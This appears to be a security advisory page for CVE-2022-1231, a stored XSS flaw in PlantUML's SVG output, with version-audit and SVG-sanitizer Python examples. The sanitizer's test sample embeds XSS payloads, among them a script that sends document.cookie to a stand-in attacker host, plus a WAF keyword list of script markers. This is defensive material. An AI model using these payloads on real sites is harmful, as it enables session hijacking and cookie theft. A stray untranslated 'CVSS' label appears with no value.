Platform
java
Component
plantuml
Fixed in
1.2022.4
CVE-2022-1231 is a stored cross-site scripting (XSS) vulnerability in PlantUML, a widely used text-to-diagram tool. An attacker who can supply diagram source can get script-bearing SVG content into the rendered diagram; when a PlantUML-enabled application serves that SVG inline, the script runs in the viewing user's browser, which can lead to data theft and account takeover. Versions prior to 1.2022.4 are affected; the fix shipped in 1.2022.4.
The impact is significant for web applications that embed PlantUML diagrams. Because the diagram is stored (in a wiki page, an issue or a document), every user who views it runs the injected script in that application's origin, exposing session cookies, authentication tokens and anything else the page can reach, which lets the attacker hijack the user's session. PlantUML's clickable [[link]] hyperlinks, widely used by plugins for platforms such as Confluence, are emitted as SVG anchors and are a natural carrier for malicious URLs, which amplifies the risk. Desktop applications that render PlantUML output in an embedded browser component may also be exposed, widening the attack surface.
CVE-2022-1231 was publicly disclosed on April 15, 2022. No active exploitation campaign has been confirmed, but the low attack complexity and the availability of public proof-of-concept material make exploitation plausible. It is not currently listed in CISA's Known Exploited Vulnerabilities (KEV) catalog; it still warrants prompt patching and monitoring.
Organizations and individuals who render PlantUML diagrams in web applications, in particular through PlantUML plugins for platforms such as Confluence, are at the greatest risk. Legacy systems running older, unpatched versions are especially exposed, as are shared PlantUML servers where diagrams authored by one user are rendered and viewed by others.
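The first thing to establish is which PlantUML version each deployment actually pulls in. As an added example, not part of this page or of the PlantUML project, the following Python audits a Maven pom.xml for the net.sourceforge.plantuml:plantuml dependency, resolves ${property} versions and flags anything older than 1.2022.4. The pom.xml content is a constructed sample, and treating PlantUML's older plain build numbers (such as 8059) as pre-fix releases is an assumption about that numbering scheme.

```python
import re
import xml.etree.ElementTree as ET

FIXED_VERSION = (1, 2022, 4)          # first release containing the CVE-2022-1231 fix
GROUP_ID = "net.sourceforge.plantuml"
ARTIFACT_ID = "plantuml"


def _local(tag):
    """'{http://maven.apache.org/POM/4.0.0}version' -> 'version'."""
    return tag.rsplit("}", 1)[-1]


def parse_version(text):
    """Turn '1.2022.3' into (1, 2022, 3) so tuples compare numerically.
    A single number (assumed to be a legacy build number such as 8059, used before
    the 1.YYYY.N scheme) is mapped below every 1.YYYY.N release."""
    parts = tuple(int(p) for p in re.findall(r"\d+", text))
    if not parts:
        raise ValueError(f"unparseable version: {text!r}")
    if len(parts) == 1:
        return (0, parts[0])
    return parts


def is_vulnerable(version_text):
    """True if older than the fixed release, False if fixed, None if the version
    is not declared here (inherited from a parent POM or BOM; resolve it manually)."""
    try:
        return parse_version(version_text) < FIXED_VERSION
    except ValueError:
        return None


def find_plantuml_versions(pom_xml):
    """Return the declared PlantUML versions, with ${property} references resolved."""
    root = ET.fromstring(pom_xml)
    props = {}
    for node in root.iter():
        if _local(node.tag) == "properties":
            for child in node:
                props[_local(child.tag)] = (child.text or "").strip()
    found = []
    for dep in root.iter():
        if _local(dep.tag) != "dependency":
            continue
        fields = {_local(c.tag): (c.text or "").strip() for c in dep}
        if fields.get("groupId") == GROUP_ID and fields.get("artifactId") == ARTIFACT_ID:
            version = fields.get("version", "")
            ref = re.fullmatch(r"\$\{(.+)\}", version)
            if ref:
                version = props.get(ref.group(1), version)
            found.append(version)
    return found


def audit_pom(pom_xml):
    """Map each declared PlantUML version to its vulnerability verdict."""
    return {v: is_vulnerable(v) for v in find_plantuml_versions(pom_xml)}


# Constructed sample pom.xml: PlantUML pinned through a property, plus an unrelated dependency.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <properties>
    <plantuml.version>1.2022.3</plantuml.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>net.sourceforge.plantuml</groupId>
      <artifactId>plantuml</artifactId>
      <version>${plantuml.version}</version>
    </dependency>
    <dependency>
      <groupId>org.slf4j</groupId>
      <artifactId>slf4j-api</artifactId>
      <version>1.7.36</version>
    </dependency>
  </dependencies>
</project>"""

if __name__ == "__main__":
    for version, verdict in audit_pom(SAMPLE_POM).items():
        state = {True: "VULNERABLE (upgrade to 1.2022.4+)", False: "fixed", None: "unresolved"}[verdict]
        print(f"plantuml {version}: {state}")
```

Run it against a real pom.xml by reading the file into the string passed to audit_pom; a None verdict means the version comes from a parent or BOM and must be traced there.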
• linux / server:
journalctl -u plantuml | grep -iE "svg|xss"
• generic web:
curl -sI <plantuml_diagram_url> | grep -iE "content-type|content-disposition|content-security-policy"
• wordpress / composer / npm:
grep -r "<svg" /var/www/html/wp-content/plugins/plantuml/
disclosure
poc
Exploit status
EPSS
0.20% (42nd percentile)
CVSS वेक्टर
The primary mitigation for CVE-2022-1231 is to upgrade PlantUML to version 1.2022.4 or later without delay. If upgrading is not immediately feasible because of compatibility constraints, reduce exposure in the meantime: validate diagram source before it is accepted, sanitize the generated SVG before it is served (strip script and foreignObject elements, on* event-handler attributes and javascript: or data: hrefs), and serve diagrams in a way that prevents script execution, for example through an <img> element or with a Content-Security-Policy that disallows script. Web application firewalls can be tuned to block diagram submissions containing <script, javascript: or on*= attributes, and PlantUML or plugin logs should be reviewed for such diagram sources. After upgrading, verify the fix on a test instance by submitting a diagram with a known script-bearing payload and confirming that the rendered SVG no longer carries it.
Update the plantuml/plantuml library to version 1.2022.4 or later. This fixes the XSS vulnerability that allows execution of arbitrary script via SVG embedded in diagram output.
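The interim control that matters most is filtering the rendered SVG, because that is where the script ends up. The following Python is an added example, not code from this page or from PlantUML, of an allowlist-style output sanitizer: it drops script-capable elements as whole subtrees, removes on* handler attributes and rejects href values whose scheme can execute script. The sample SVG is constructed to imitate PlantUML output with three injected payloads, and the element and scheme lists are this example's own policy choices (assumptions), not an official PlantUML list.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # keep the default namespace readable on output
ET.register_namespace("xlink", XLINK_NS)

# Policy chosen for this example (assumption): PlantUML's own output needs none of these,
# so any occurrence is attacker-supplied and the whole subtree is removed.
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "set", "animate"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" covers relative URLs and #fragments


def _local(name):
    """ElementTree stores '{ns}href'; reduce to 'href' for both tags and attributes."""
    return name.rsplit("}", 1)[-1]


def safe_url(value):
    """Reject schemes that can execute script. Browsers ignore ASCII whitespace inside a
    scheme, so it is stripped before parsing to catch 'java\\tscript:' style bypasses."""
    compact = "".join(ch for ch in value if not ch.isspace())
    return urlsplit(compact).scheme.lower() in SAFE_SCHEMES


def _scrub_attributes(elem, findings):
    for name in list(elem.attrib):
        lname = _local(name).lower()
        if lname.startswith("on"):                                   # onclick, onload, ...
            findings.append(f"<{_local(elem.tag)}>: dropped {lname}")
            del elem.attrib[name]
        elif lname == "href" and not safe_url(elem.attrib[name]):    # href and xlink:href
            findings.append(f"<{_local(elem.tag)}>: dropped href={elem.attrib[name]!r}")
            del elem.attrib[name]


def sanitize_svg(svg_text):
    """Return (sanitized SVG string, list describing what was removed).
    In production parse with defusedxml.ElementTree to also defuse entity-expansion attacks."""
    root = ET.fromstring(svg_text)
    findings = []

    def walk(parent):
        for child in list(parent):
            if _local(child.tag).lower() in FORBIDDEN_ELEMENTS:
                findings.append(f"removed <{_local(child.tag)}> subtree")
                parent.remove(child)
            else:
                _scrub_attributes(child, findings)
                walk(child)

    _scrub_attributes(root, findings)
    walk(root)
    return ET.tostring(root, encoding="unicode"), findings


# Constructed sample imitating PlantUML SVG output, with an event handler, a javascript:
# link and a script element injected alongside a legitimate [[link]] anchor.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="220" height="110">
<rect x="10" y="10" width="120" height="40" style="fill:#FEFECE;stroke:#A80036" onclick="alert(document.cookie)"/>
<a xlink:href="javascript:alert(1)"><text x="20" y="35">Click me</text></a>
<a xlink:href="https://example.com/wiki/Node"><text x="20" y="80">Docs</text></a>
<script>fetch('https://attacker.example/?c=' + document.cookie)</script>
</svg>"""

if __name__ == "__main__":
    cleaned, removed = sanitize_svg(SAMPLE_SVG)
    print(cleaned)
    for item in removed:
        print("removed:", item)
```

Treat this as defense in depth rather than a substitute for the upgrade: it keeps the legitimate https anchor intact while stripping the three payloads, but serving diagrams through an <img> element or under a Content-Security-Policy without script is what stops anything the filter misses.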
CVE-2022-1231 is a stored XSS vulnerability affecting PlantUML versions prior to 1.2022.4. It allows attackers to inject malicious script through embedded SVG content in diagrams, potentially leading to account hijacking and data theft.
If you are running a PlantUML version earlier than 1.2022.4, you are affected. Assess your deployments immediately.
Upgrade PlantUML to version 1.2022.4 or later to resolve this vulnerability. If an immediate upgrade is not possible, apply input validation, output sanitization and WAF rules as interim controls.
No active exploitation campaign is publicly confirmed, but the low attack complexity and public proof-of-concept make it a plausible target. Monitor your systems closely.
Refer to the PlantUML documentation for deployment and upgrade details: https://plantuml.com/de/running